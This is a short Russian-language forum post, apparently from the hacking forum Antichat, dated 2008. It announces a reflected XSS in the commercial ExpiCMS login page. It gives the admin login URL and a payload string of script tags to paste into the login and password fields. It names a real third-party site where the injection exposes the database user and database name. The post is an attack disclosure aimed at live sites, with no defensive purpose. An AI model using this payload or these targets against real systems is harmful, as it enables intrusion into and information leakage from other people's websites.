11.03.2008, 18:54
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
ExpiCMS
www.expi-cms.ru
стоимость
1. Лицензия 1 год - 6 900 руб.
2. Лицензия 3 года - 12 900 руб.
3. Неограниченная лицензия - 17 490 руб
Пассивная xss
вход в админку www.expi-cms.ru/cms/login.php
в логин и пароль вставляеем например такую конструкцию 
</SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>
так например на marypoppinscafe.ru/cms/login.php выдает некотрую интересную информацию в частности User - mary_poppins DataBase - cms_express_oksana_mary_poppins
Последний раз редактировалось xcedz; 11.03.2008 в 19:36..
|
|
|